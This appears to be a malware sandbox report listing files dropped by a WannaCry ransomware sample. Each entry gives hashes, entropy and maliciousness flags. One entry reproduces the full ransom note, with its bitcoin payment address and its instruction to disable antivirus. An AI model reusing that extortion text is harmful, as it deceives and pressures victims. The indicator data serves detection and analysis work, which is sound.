                                SHA1:1ED82154B119531E61E8BFCD91A7A99373CA5F75
                                SHA-256:BA0BEE8A029E62F9E3995700D90B3D2CB2F3A04EC04780D9D6547728CD061CCC
                                SHA-512:8A904B6A7E61CB99BEAC537BB2B9489F76317DE3C832B341BC80E3A3670134D6C7154E19E9DEC54A81DF2801430B3114F3BE4DDF96A75A67CD29398B0150A3B1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):27000
                                Entropy (8bit):7.99393022209552
                                Encrypted:true
                                SSDEEP:768:bCDqZ8Y6HN1sYJoq1T9mUhZfmLl5gs3jP0m/YXu:mqZ8Y6tOYzT9rfmEs3j8mEu
                                MD5:2B5CA8DD54103D6C565BEC4533DEFA27
                                SHA1:825D49866E3FA225CC1C4024F6665491FD9AB95D
                                SHA-256:D55B05EE09A5A4006148EC1529CB8E613034D91EE2B3A557A28C0C5885E47145
                                SHA-512:DFB99BE6E7F11CD0762D0F898AC68860C1FD9AE8BE7D57855BFCA56B03455A1FEA0480A67466FD6C464ADE9D75C348FD18F9311C362364BA5B04188D55D86248
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6952
                                Entropy (8bit):7.975707572065335
                                Encrypted:false
                                SSDEEP:192:Qv9Co4tuSlwB92JDGOpoZXjSwr91EPvk9pUtlet:QvI3kmBGOsrTKtlet
                                MD5:E88DDE86FE6A01C2A8F9C085A82AC777
                                SHA1:54FE2D381A3D76E9F0ABB14D189AEFE6554E06FF
                                SHA-256:FACA9B0A539C53CDC269FE4788CDDBB1A6B1A0FEB581814FB9B6693727B5ED29
                                SHA-512:29BE707D46A5AF6C9213C862E0DDEAA2C342B109AC55259219B0791A18A531F7184E65F701F3F340A09D0C7ABE191A42C99862064BD6E4620180F71B0593C580
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):242232
                                Entropy (8bit):7.999101401446999
                                Encrypted:true
                                SSDEEP:6144:GQOK3eUp5ZVcH83Ys62AjjPfv7rXFQvg3VyslQB:GQhBp6H83R62AjjPfv7rXFQQV3QB
                                MD5:184B65FAFBAB73592BA86259A84CE0F9
                                SHA1:A32E59E99D902ADE4E347CA8EF5DB36E56783DDB
                                SHA-256:0B7BDE5628564995A7622B89793A16BBA701F546B68962EFB0093B3B96E5D9A6
                                SHA-512:12B534F1DA57E2B3533DE94EF0B757CF7E5A7A9D240F37F5003F7DB4901FF2A39B02F5280D4BD95FA3EF91D09F16609C1E9456D51A8F30ABF22458C53816D057
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):76360
                                Entropy (8bit):7.997792662915774
                                Encrypted:true
                                SSDEEP:1536:KsqF2AYHp2SIFSFU128vndiHuEusRdY44fqI3qQSHoGq10vQ:KsiYHV3G12yOu2z3IaQ910vQ
                                MD5:24E06A9110A2A0C40D10CAC653EAD0F7
                                SHA1:52A68E5D3A6C812DC5A2C1F582BF67F80A3D8086
                                SHA-256:AA54BBB346444118790FB2EF9584561D47AC548FDB8B9019F532C7BDC9FDEB34
                                SHA-512:525283A80356E899AB10FC1D07401F33E402CBEBD87AE581B370E7E3BB5256448EB44C991355D82398A271DB40B17E5265ADD0A3E167DC005C6EE0D27DCE7FF5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):164584
                                Entropy (8bit):7.998933938468432
                                Encrypted:true
                                SSDEEP:3072:Mpri4hJ40D96qjEYiccceykh5enL1R4S5QIEhBzg92CzdCeY24N:Mpth8qFpiun83Onzkee
                                MD5:581BF5411DCBBE80ECB5A0AC5317792E
                                SHA1:4B3A6F4B682DC24A869B6D7AA2ED1D2E08C83F1D
                                SHA-256:C3B5470507A82C602C06CA913508E06B05F4F7F95739A35CDC78AA5336A373A5
                                SHA-512:25ED5F14693D9412F3CD8C24C6A2EA0FF02BFDB98275348645D3806672F387F8C1B83E0AA9F953B6CAEE8AC823407D0D1C9B9E918FE3D56FE60B4CF25095B753
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.155833791510369
                                Encrypted:false
                                SSDEEP:6:bkETnNdxXxKzH1cggFJtzSbKlTccopBl+Zi3G3LPTRFS8fqn:bkEDNdxX/qbKlTtWSGG37tU8y
                                MD5:75485684FC4530BAECBD6A53F39C739C
                                SHA1:68CF60CE968AE93BE9F04BFDD03B3B653DA5E043
                                SHA-256:FFB75AA56B3B954C776901C1C0529476D7071E613E51BE8559877CD95F43DB31
                                SHA-512:DCC70EA07AD17DB48AE621C9F36083308034F72C5D78596F4255A9CF7645FC86458C0E3520FDC542FC2E21F80E5EF9C672DDCF7B993E040EB664B133E7110153
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):27560
                                Entropy (8bit):7.992610377110071
                                Encrypted:true
                                SSDEEP:768:mncjG9L5U65va/kxtctsWMW55sn/aVkLMF8kzjz7c5kM+OV:OvLK65vacxw6C5snSaL2cSy
                                MD5:EBDD8BEDDE90600005A727B00B5967F4
                                SHA1:856E083AC6AE07089443ADDD88FE09D289B7F451
                                SHA-256:20E00AB6C6B79BC061D9753E2C7EBC9B5E02AA5234C67A95BC2E40944BE5D3DF
                                SHA-512:FB970B7E5F740E620A44E19883C0D157A649382CB73555AA9A21131E6561F746F0D369F9378AAA06567BFE70EF35470BC36DF0305193658C6C1F25C38FBE9C6C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):229640
                                Entropy (8bit):7.999183686930641
                                Encrypted:true
                                SSDEEP:6144:jqikgomW5OiWa/eSyWyD744R82xWT9rfi8gtDKtwIK1:jqikgqjmStyDQ2xWxPHtdK1
                                MD5:72C7C215105C33A2D6CEDF9C258E0A6F
                                SHA1:1476D351EA3E4540A56331C20D0A1C88C9EAF8A9
                                SHA-256:D3693CAD3394F3A200DC3D9CD258454594AFA9BC019E8773C8682BF4E03A1DCA
                                SHA-512:970D2ED636A28DC26B60C8C84CF4093C45ACED7EF1C470BBB33219EDC26D7D43B9BAEEAC219D9D9FA1B8DBCD6021C4CE0830850B825384E05F7C213F5B7386F0
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):600
                                Entropy (8bit):7.623341751163981
                                Encrypted:false
                                SSDEEP:12:bkEMp4ZUanDx+A8BABeajgSm+AYk5Yyoys/MbC0PMPwt9EDOGvWl0SE:bktpsDx+sBeaAYk+hpaC0ttuSGv4VE
                                MD5:A7E8E828198A78328AD5B628680EFD3F
                                SHA1:3E8613C9C0EFB5324D447671CAC90DA54AD58A8F
                                SHA-256:BE43591B82200A59241AD41176FD8EF4A537F2DD1F11197DD6AD31AEC9A4C755
                                SHA-512:C77AFABED28C9ACB7177D4C427AD0694FE141CBF89E4E1F33D3B89C74902A920DBA60E94246AAC7EEF20BC2CC4610A42A9ED1685B812CA85B89F530CA41CC48C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.987456972046725
                                Encrypted:false
                                SSDEEP:384:gzJMl2QSBwEKLJWtuduyuiau8htrTs4lmpoSdZjoHDBjtXR:r8QSBwZMyuiD8htA4lmrdaHXR
                                MD5:FCD1CBABDD7DF98168CE175F6B136150
                                SHA1:6F9BFB8D7B0F37C3B9A15098DF9F2359A2A0C42D
                                SHA-256:27E3EC867506F37B95BDC42D0C7985C8361027E55DB3A2C17E3831B1A685C5DA
                                SHA-512:80CD736117DA09A6AF49750D0EF1BBC48264D8E8A67C2C93281D5AD9CD0B182025B8FA530E2114FFD590A5F7F658F7A42960D7D2EB6E09B1414E09B842AF68D8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45336
                                Entropy (8bit):7.996355135175605
                                Encrypted:true
                                SSDEEP:768:AsGZ9NYOan+iJi6ljzNmHSVLObjy6cKiU/Ek4bY9rX3OP+rna3dCmTg6D5McmP1U:AsGZ/YPhdBUHS5OPyoCBbWrX3O+KdCm3
                                MD5:421BEF3E923E7A38FB659F1AB263B467
                                SHA1:A781315E5E5C535024E57EA92CAB2E5D9B34990D
                                SHA-256:9DC08738ECD1EDAB97EB3160D12E2E8359384B82CD10C14521B7B7229B75116E
                                SHA-512:0CC784F721D5A1ACB70EDBE17035F91157B4EFB3E80896B7B4F5789D29CB443AE33AAD7B1ADAE8E6EE0CB51E217772A1D1BDC173AC5415DF8D4CC0B0EC3944FF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6776
                                Entropy (8bit):7.9709294835018785
                                Encrypted:false
                                SSDEEP:96:oROgSvKdpJQDO8lqeXF4Ah5oR1qhHbxuR8hic9fowl5qOQ0HeosmZkXxJv5NVcxZ:cw15Q1qhHVXhowluZmZkXjxvcxJP
                                MD5:D028491DBED54475182B9E77C0F10242
                                SHA1:D77A56615AD9D633B6A1D4740100E600050F2EC5
                                SHA-256:C21400DB17DFDD8612FDB7786A17102B04F67428A21703910F1C9E6E5E1A2B04
                                SHA-512:B9D8FEADE69F260BF5C355685116EA0D512D4337BFB081E367DE2695443A5B7AC2A29CAA925E51697926C51FD6876E781565B9FD2276D4CC474372C4017EB39D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4664
                                Entropy (8bit):7.960784159131869
                                Encrypted:false
                                SSDEEP:96:oA8r8pCRpMqDCMU1CHRccjdZraJriCESoG4LZE/mX6xoVIGn9sSx8:WruCgG40cwbG4CEQ4LimXR9u
                                MD5:D8DD3B60700B22DDAA57FAE8BE94CDD7
                                SHA1:35E8549507C92C920BA0C99D62BBE4FA25E93EBE
                                SHA-256:D0408C9D1318C5817CA57E83007534975C6EF8123F41A45F669CC18822EC8AAB
                                SHA-512:933A8FE1E3C816CADB2E8EE101181EE812626DC30294E8849F1A79D7626B1EBFDC97DC36EC0F445E04B3DCAA7790A9FB6D5167248525483582D8E404488CF290
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8616
                                Entropy (8bit):7.978767563831868
                                Encrypted:false
                                SSDEEP:192:RiLcbuiA/u9/E7+05CmnYKd/CC33DXmLJFK1vU07WEiiwu8/l:RZuiA/uxE7+8BvzWLu1b7eiwHN
                                MD5:745B3627570D33A23D0C594021841AC3
                                SHA1:D9A8BF2927786126176004720B988355250728AA
                                SHA-256:F54BFB883ACE202C7C50E01B963A1FA578843FE2B5C243E5CDEE1154938A6C7D
                                SHA-512:B2312216C225F64582156F53EDE143DA3300E273216277A5D5A3501E3A60AF61057773052C94A5FD28553CC3C5AB869D9E1374859F72409753B9072F04DCCA6B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14408
                                Entropy (8bit):7.988128531880831
                                Encrypted:false
                                SSDEEP:384:vCCZE7ORx/7UCw3OL9iv4dfiKXZSxaGH87:vCCRRhb8vikHK
                                MD5:5E9508A839979A4A7B3E2FCD5A2849D3
                                SHA1:2104DED8C5505AA5A5BA6C63D08968288D90ADB4
                                SHA-256:E12F6A9D225C47189CF1D260E20446E938219C8E01B793BB8A15981A265DD400
                                SHA-512:F9B7F1F18C96BCA04158B413BCE4A9A3F2357A6DB7CE39E612E475182F706E6F8131008488196E1F45320384CCA25D595F9FFF44D47F5B5200C2AC9C5730F75A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5240
                                Entropy (8bit):7.963769984531869
                                Encrypted:false
                                SSDEEP:96:o2IGDuQyXUSa+GfDKGnu6JSmV7OPe1fv3vHF4V2HHW7c/GasCys1ve:ZRNyXUf+GfDKGnBEmVqW1fl4V2/vsC38
                                MD5:C62B978E4D32CCF1AFCE3F130111770F
                                SHA1:3C5A24B14A30A8E9643DF9387B29CC9823EA7879
                                SHA-256:F44ECBB8A86A1B842DB6D1C41E24685C635BFF1524738A3CC242D1A81EC4533E
                                SHA-512:B5312D531A65CFE14F2413A3AE841A5BC47122DFB07F4AF9C168DFB79EBB55D6BE638963845C11A9046272008D3DB98838BCB3E292F86F8D95BA18E4D7CC747D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7384
                                Entropy (8bit):7.971346909816599
                                Encrypted:false
                                SSDEEP:192:TEjhp5acTSCVuWk2SML1UeHKdhjYl4VIBthlfe/FxFlA:0O0uWk2PKdhfipNeplA
                                MD5:0FA5C6A275CEFF29D004C61DDF9CDAE5
                                SHA1:95AEB4CEEE2E7609CE9FB12CE96EF8443702AA99
                                SHA-256:A103B671A2DCE9B51426DDAB76819600FF31F400DCAF1EEB9B06C8262740AC6F
                                SHA-512:96ED5037573D8A89465F12102B4A8B6C6249614D523471D00695B27BFD78DF2F6C859076D0CA4EE50E0C442689AE5C4BB8FC61BD1FA074882FDFC609A9840193
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9032
                                Entropy (8bit):7.979038002619097
                                Encrypted:false
                                SSDEEP:192:YgX4Y0Nvi60zg7awlLX4XXwuboe7YvPzODtbn/ECLKyZGTH33du:BX4YIKjaawN4Qubo/vbODxn/JLlUZu
                                MD5:778500D858A554C861F4B5F4F35EE443
                                SHA1:17B3C75E1CDB6439C800A0625DEB044B81E3C145
                                SHA-256:E69EFBFE94D45C4FA18A77D33BE8ABD90DB7CBF1AED2A371405538F88D60FAD0
                                SHA-512:F90750EB6B60F630C300CCD31CCFAF67E64FACA8B715C4511D1723F533924656F8FF52594602F8CE736B32E10598DA76F3A3CB87C3CBD60D40C25F2534542204
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7960
                                Entropy (8bit):7.973498783171707
                                Encrypted:false
                                SSDEEP:192:pA/iZxS3YHs5MBwViHTdf/KQOkrADsgoUnm:pxSSsHVExf/KQOkrADsinm
                                MD5:E0D55C9E2C64E307F1C208C1FF0813F0
                                SHA1:DDCB28E44F077AB5D50E1E15DC53F92DFE9797B8
                                SHA-256:38F14DA4C30350A91B84367D4EB4D8E8C4C9431B3832574893083132FDC826C2
                                SHA-512:27C335C77C1178C11706AD14D5C696813D5698A10AC08DFBE5F061F2DC7345864BC2BA8781C3B7A6D8452046712B23853BBD4568A649BAE132B93ACE88A81C2D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7032
                                Entropy (8bit):7.972004524057607
                                Encrypted:false
                                SSDEEP:192:x6QwvzaSpCgIwkne9aG9HTd+56AtETV3j:x6dzaZgD2eBHT0S5j
                                MD5:8FF0367DE3940B774EA7124CBC222AE0
                                SHA1:3BF79205E0562E8D4292602A453E5CEDC31C062F
                                SHA-256:387478F332A51A3F029EDB7604CCF15A72E2261C6E2A4DF8743A4FA8DCF836D8
                                SHA-512:C247C38C0B059A50281A2254E3D29DAD74A70438EC65D03255F84C116A95DF22818B74F1A912E779A9FD7E89C9821065ECE6F4CB903679A2F047636DC8946746
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8792
                                Entropy (8bit):7.979271345467522
                                Encrypted:false
                                SSDEEP:192:dVKLWAQ14S41n4b+G+lX8UfcmsoS0SgqZ4WTMg4i9JBx23J4t:dkleJ41n4b+ZMUfcDo2gq+WIg4i7BI3k
                                MD5:672AB49AEA1E3B4A75C0E7F684B00F2C
                                SHA1:A07E299FBDB73A7A0FDA6B07652A9BC54C3BD592
                                SHA-256:E4100418E711CEB0C3ECCF6F8D19D3343E8776C87B3B973B3846BA83D8CF37F1
                                SHA-512:89F6245B880DEA865AE6A63F5604161383144E76BE1E82ED8206D98128566B4DC888F3D90C1768E1FA3BB9854CAB7D11E816E89DE8BD4AE477766E4E478F9FD2
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.991863006782706
                                Encrypted:true
                                SSDEEP:384:qme1Zvwpsl4j8NbYhJMJVjReMWatl/Pq7AS2pJFxKgRLwEQ+IVd/wUveURAv:q3vwpsQzPM/4wtNIWRLPQduUvnAv
                                MD5:880D3A3BF527310FDD1230879B1CE7AB
                                SHA1:2968D0E23FC60551F33019C9729532E7E1AA0B03
                                SHA-256:5D0446671DEAED4D73B6D6B71566A647A1E09687E37C3F9A939B9D1F5B34BEDA
                                SHA-512:DAAF46B28D55A54B37B7096A62CE6B6AB0A25266B8C013519F047E404CEA71AD92A6D7C78A032033317375F9B1715DBA415D3319F03C3563F928D855ADF94EF1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.99211829234718
                                Encrypted:true
                                SSDEEP:384:GrhRypGLMREWpu086pKlDGbETlVn3QfbeC5uLYxTpzJW7HhTEkfMLJxoGEuOIFQW:Gr6yMRHpA6QYETlZEuYxNQLh2Suj
                                MD5:497B9C5277932AC4367E3166018EDB67
                                SHA1:0EE96306299CFE68085725D6BABEB81B67CC2355
                                SHA-256:D96CEBC5C8E22C77CD7C4C653005F6DC1BB95175C3848C186EA6A933CE3B665E
                                SHA-512:B7C6235A640BC536364715A8A96BCBD8DF9C1D822D932CF4E80D7E21A0C5EE681D8E0F9AC703849AE67947F9828F15749279A3D274854AF7E9F0C14148A0E52C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.9939748039748775
                                Encrypted:true
                                SSDEEP:768:rZqIKIA7CZnZjASDve0UAFJoUwwdF4FvPVMKHX:Fq6A7CZZj3+ZawFnVjX
                                MD5:11A0ED07075D4DEE231559AFA7FA697A
                                SHA1:01F155AAAF9ABE1691D112D266D02682FCE63BB1
                                SHA-256:4F3FD86A88FD5A5E7B6138BD6EE84ADC67998F64A1F5FE54EA05F166E3CC1475
                                SHA-512:71A89A1F7CC9DE4B004D870BC4D955C45025FFA5C08D1124718FC9FBCFC77F34B7A903AE2D4128B498A5CEA1F726DCFCDBA2F4BB922EE784CCFD084305EBC3DB
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4376
                                Entropy (8bit):7.954988295352507
                                Encrypted:false
                                SSDEEP:96:oG9JTpdXVpp/v7H95rb/pC/Wla6isT2EX2NGVbxkwvfimPqaeI:1B/b/rbxIKfCEbxkgyaeI
                                MD5:2919F5872F9D8A615E8FF4FB9E585896
                                SHA1:C01333065460103F4FC84494DBABD16223874B29
                                SHA-256:84A9EC0943D643896C737E86E2C0DFF17B3E128D0ABEDE01B0D5D31CC73EE872
                                SHA-512:EC8BCECEDA2D021AD1AAB9319EDE0D9A786A299C8E061AA723252B6A2C05E7CA3F121E2D01F1BA744F131AE3EFA48D3F64687D540BC5275CDE27DE50B0E13870
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.9938753840559755
                                Encrypted:true
                                SSDEEP:384:vygueM61aH5tMN2HmBHvPdFG3rusZwthMDOsjVHvexm3Xq47BK6H93E+8ZrRmk:vUSJPPdFG34/mpVHvam3ZH93EBZ9t
                                MD5:806EFAC534C7F74D57D47B46126511CF
                                SHA1:6DA5028D6FDFC7EB57134D5141243500B4F35DA4
                                SHA-256:69A7DC9D1EA30F27BA7B97611E5EB823122393C778B32F8AA8D463EC8D7BA95B
                                SHA-512:B6C420759BC0226D1C3B1D44514B89D505A7F67B4DDB335B2D9F98889FACAD865A6B6DFAA9A8429C3410A631E3B87CC647FB4A1D2831F096DB3333033FDEA1C1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7160
                                Entropy (8bit):7.971077299985903
                                Encrypted:false
                                SSDEEP:192:m1sfQFQgyeX1VFq+iR9xPTBuwrmnfv/zn9Q:1fQQgyeX1VFqF9pifJQ
                                MD5:E9C730BDE31E3A13B594E0BF108046F8
                                SHA1:ED3A4D28EB8F3F7F39F5D53229E769A8E02FFFA2
                                SHA-256:597130712C0829B872B58279BE399BE05061B0DF42DC6AAFBE3B9E06DAAC2B17
                                SHA-512:02E45E65F6CC9903E437BB8CBB73C6E3E20E854F7168C2C684775B6FEDC8EF19610A4BFA47EA1CB7615D47B0F2AF44D10925E49998FEEDC58D00B94AB84D395E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.988678317073803
                                Encrypted:false
                                SSDEEP:384:TfmGTYJhsTImbldLfX/ObdSihHGyVkxEaq0c8kybcIe9IgYWg:bmGTyhCldL2bdDHGfWLZJPIig
                                MD5:8CBC6806124C2A42F141CA1101328E6F
                                SHA1:7238B1F4EE0BB8A264A72CBF86EF3067440ACD32
                                SHA-256:C20C53C027036A9922A14A505FF6B6D603F75137EA5386DC599CAF9EF4C47F06
                                SHA-512:9562E4B67F88E5AEC43A79E75ECE4DABE6E5FCE5B50CF3F8898D6E37AA5E0EE55FFB1E62959DA7A96231822D103C88D3DC8311B680CBD0374FF96F1EF1CB17DE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.989086214686893
                                Encrypted:false
                                SSDEEP:384:4jBto3EDQvdIuPSXKWhVb9gbQnHbzF3Xq9BV0FKmLK682L:AtA7ve0IjlvZLz
                                MD5:C426D827D231905F00020E6C3BD75A0E
                                SHA1:95F7D1EEDDAE28497FDE67FAC8358C4B3447F5A4
                                SHA-256:F565BB8DD0F6D2D062913819DF7A2B7D3A8AD4A0CB1878ACFF123FDA4F02A934
                                SHA-512:D27975BAB4796E21615E66A514A1169DCFF962A865E04E25D0CB78E5B8AE106AC59DDA8D4FC21F9F3218DAFB6860695C5643DA5AD36AB324686C094155E881B3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):424152
                                Entropy (8bit):7.99963681436375
                                Encrypted:true
                                SSDEEP:6144:m3Nil2nXEuvaOuqo9G/N0rhsSf1HeV78NAI00Lpc75ddpji8DYWxv:mcoXP1o9JdsSdHc7/0NY5d/TDv
                                MD5:1528D334BB31355F99614A2C12202D45
                                SHA1:8516727ACEA4C17042848AACCFF7B114A63ED44C
                                SHA-256:5432EA4CC430E2752B0EEF8A07D8115A9F18D672D97E53E2F15460EC8448F9FA
                                SHA-512:1F7A8644B65FBDC89A6457B684F9BCED6A7C4A3649BC17AE33DE832BD271491143719526550B9EF071158A38488A2DC81D33658625D703863E434B052F03FE11
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):97848
                                Entropy (8bit):7.9980461319611935
                                Encrypted:true
                                SSDEEP:1536:VKU/aBFMDnHXm81DyG9ZJYmEPA614OjBUI53zkMELYnJsL3E3OGReN1PrD:EnByuGamEPAQ4Q12MEUmL3E35RozD
                                MD5:2D05B7505D8E5A1F057CF4FC429B859D
                                SHA1:B3F2E998A0A576658071F53EAE54B0AA328CF4DC
                                SHA-256:92E7AED2712AF89767EA589EA87697F4CA9F8F1A67F4A8AA26AC935DDEF53F22
                                SHA-512:44D00A9445E4702D3989F10D7ED77CBA14496B5B71A987529D0B14DE3B6F5DA75AAA76A0D87D7E19CE050907A3842FDBED62F78C6FF4134C4C22D191E24B3A02
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):100008
                                Entropy (8bit):7.998317699597924
                                Encrypted:true
                                SSDEEP:3072:e8XCs3BrI7QE5ctm/c+ZLwrQcbzp+CWRhUgQ:P3xID52vTbzp+Cw2gQ
                                MD5:A132D79D35C3A4A3F73EFBEA5F789FC7
                                SHA1:3867D5FFFE92BD0FD4B5615C607DCB0C710957DC
